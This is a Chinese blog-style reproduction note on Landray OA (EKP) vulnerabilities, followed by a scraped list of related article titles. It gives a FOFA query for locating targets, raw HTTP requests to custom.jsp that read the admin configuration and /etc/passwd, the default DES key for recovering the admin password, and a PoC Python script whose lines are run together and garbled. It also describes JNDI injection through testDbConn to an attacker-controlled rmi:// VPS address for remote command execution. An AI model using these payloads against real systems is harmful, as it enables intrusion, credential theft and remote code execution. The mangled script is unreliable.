使用需知

由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。

本文为工作中遇到的漏洞,文章为自己复现做的相关笔记,参考了很多前人的资料,只是做个笔记。

一、漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,同时可利用ssrf进行远程命令执行。

二、漏洞影响

蓝凌OA

三、任意文件读取复现

fofa语法

app=“Landray-OA系统”

利用 蓝凌OA custom.jsp 任意文件读取漏洞读取配置文件
读取路径:

/WEB-INF/KmssConfig/admin.properties

如果用BP抓包,POC如下

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzipvar={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

或者用hackbar,POST方法提交下列数据:

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}


获取密码DES解密登陆后台:默认密钥为 kmssAdminKey
注意没有\r
获得密码:******
访问后台

http://漏洞ip/admin.do

输入获得的密码即可登录。

如果服务器是LINUX,似乎可以这样做,但我没有弄成功

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzipvar={"body":{"file":"file:///etc/passwd"}}

另外附上大佬们的POC脚本;

#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.techimport base64
import requests
import random
import re
import json
import sysdef title():print('+------------------------------------------')print('+  33[34mPOC_Des: http://wiki.peiqi.tech                                   33[0m')print('+  33[34mGithub : https://github.com/PeiQi0                                 33[0m')print('+  33[34m公众号  : PeiQi文库                                                   33[0m')print('+  33[34mVersion: 蓝凌OA 任意文件读取                                          33[0m')print('+  33[36m使用格式:  python3 poc.py                                            33[0m')print('+  33[36mUrl         >>> http://xxx.xxx.xxx.xxx                             33[0m')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"}data = 'var={"body":{"file":"file:///etc/passwd"}}'try:response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)print("33[36m[o] 正在请求 {}/sys/ui/extend/varkind/custom.jsp 33[0m".format(target_url))if "root:" in response.text and response.status_code == 200:print("33[36m[o] 成功读取 /etc/passwd n[o] 响应为:{} 33[0m".format(response.text))except Exception as e:print("33[31m[x] 请求失败:{} 33[0m".format(e))sys.exit(0)#
if __name__ == '__main__':title()target_url = str(input("33[35mPlease input Attack UrlnUrl   >>> 33[0m"))POC_1(target_url)

四、配合SSRF进行命令执行复现

使用JNDI注入工具启动监听:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "Command" -A VPS ip

-A参数填写vps地址,就是你服务器的地址。
-C参数填写自己的命令即可,一般都是去ping dnslog
Dnslog:http://www.dnslog.cn/
如图所示:

随后用BP抓取后台的包,利用已登录的cookie去进行命令执行。这里需要注意把JDK 1.7对应的rmi地址,填到BP抓到的包中

POST /admin.do?method=testDbConn&datasource=rmi://VPS IP:1099/erzyyz HTTP/1.1



就是这样子了。
附上JNDI注入工具下载地址

https://github.com/feihong-cs/JNDIExploit/tags

参考链接:
https://www.jianshu.com/p/a9250d02aeb1
https://idc.wanyunshuju.com/aqld/2202.html

蓝凌OA系统任意文件读取相关推荐

  1. 蓝凌ekp开发_蓝凌OA系统,蓝凌EKP,蓝凌KK__房地产案例应用__恒大集团

    作为中国地产行业标杆,恒大集团拥有员工39000多人,在全国33个城市设立了分公司,在全国122个主要城市拥有大型项目229个.如何实现全集团的协同沟通?如何结合业务规范.统一流程?如何实现专业知识. ...

  2. 一米OA任意文件读取漏洞

    漏洞描述 一米OA getfile.jsp文件过滤不足,导致任意文件读取漏洞 漏洞影响 一米OA 网络测绘 app="一米OA" 漏洞复现 出现漏洞的文件 <%@

  3. 深信服 应用交付报表系统 download.php 任意文件读取漏洞

    漏洞描述: 深信服 应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件. 漏洞利用条件: download.php文件接口 漏洞影响范围: 应用交 ...

  4. 蓝海卓越计费管理系统漏洞学习——download.php 任意文件读取漏洞

    警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.概述 二.影响版本 三.漏洞复现 一.概述 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通 ...

  5. 蓝海卓越 计费管理系统 download.php 任意文件读取漏洞

    漏洞描述: 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件. 漏洞利用条件: / 漏洞影响范围: / 漏洞复现: 1.P ...

  6. python文件审计系统_Python代码审计实战案例总结之CRLF和任意文件读取

    介绍 Python代码审计方法多种多样,但是总而言之是根据前人思路的迁移融合扩展而形成.目前Python代码审计思路,呈现分散和多样的趋势.Python微薄研发经验以及结合实际遇到的思路和技巧进行总结 ...

  7. 文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell

    点击蓝字|关注我们 通达OA前台任意文件上传漏洞 +文件包含漏洞导致getshell 一.漏洞介绍/Profile/ 通达OA介绍: 通达OA(Office Anywhere网络智能办公系统)是由北京 ...

  8. 应用服务器Glassfish任意文件读取漏洞

    catalogue 1. 前言和技术背景 2. Glassfish安装配置 3. 漏洞利用 4. 漏洞缓解(修复) 1. 前言和技术背景 0x1: GlassFish是什么 GlassFish 是用于 ...

  9. ThinkAdmin列目录/任意文件读取(CVE-2020-25540 )漏洞复现及环境搭建

    ThinkAdmin列目录/任意文件读取(CVE-2020-25540 )漏洞复现 漏洞介绍 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏 ...

  10. 【MetInfo任意文件读取】--任意文件读取漏洞

    文章目录 漏洞信息 一.漏洞产生的原因 二.漏洞利用 1.对靶机网址进行burp抓包 2.对上述请求包进行修改 三.漏洞修复与绕过--四种修复与绕过 1.置空../和./ 2.对$dir进行判断 3. ...

最新文章

  1. memset()函数用法及其作用
  2. ubuntu12.0.4不能正常关机和重启的解决方法
  3. 提取图像的边界,用数字标记不同的目标边界
  4. 动态规划解题套路框架
  5. 利用JS调用aspx页面(转载)
  6. art-template模板引擎详解
  7. MFC多文档中opencv处理图像打开、保存
  8. java extjs4 分页_extjs学习笔记(四)带分页的grid
  9. 中国晶体谐振器行业市场供需与战略研究报告
  10. wpf项目无法使用针式打印机_针式打印机的常见故障和解决方法2
  11. 深入浅出JavaScript (五) 详解Document.write()方法
  12. kotlin的Viewpage2+Fragment的简单使用(setUserVisibleHint方法过时)
  13. 龙芯3号处理器-龙芯3A1000,龙芯3A2000/3B2000,龙芯3A1500I,龙芯3A3000/3B3000
  14. Codeforces Round #554 (Div. 2) 1152B. Neko Performs Cat Furrier Transform
  15. 嵌入式Linux设置开机自动运行程序(基于BusyBox init)
  16. HDU 5855-最大权闭合图(-最小割应用)
  17. 《Cracking the Coding Interview程序员面试金典》----猫狗收容所
  18. rpg maker mv使用ajax,Rpgmakermv(15) PH任务插件
  19. 微信小程序项目实例——手势解锁
  20. python perl lisp_巴别塔-编程语言之旅【转】——C、C++、Lisp、Java、Perl、Ruby、Python核心比较...

热门文章

  1. 小白最需要了解的计算机基础知识
  2. 前端每日实战:77# 视频演示如何用纯 CSS 创作旗帜飘扬的动画
  3. thinkphp 3.1.3 php版本,ThinkPHP
  4. 给定一个设备编号区间[start, end],包含4或18的编号都不能使用,如:418、148、718不能使用,108可用
  5. python处理can协议文件_用Python处理CAN数据库
  6. 数据库-订单信息表(单表)_思路清晰_设计简洁
  7. 亚马逊服务器443端口开放配置aws
  8. 出谋划策 小型网吧组网方案精心推荐(转)
  9. BZOJ4567 [SCOI2016]背单词
  10. ctf镜子里面的世界_一个小编姐姐的CTF入坑之旅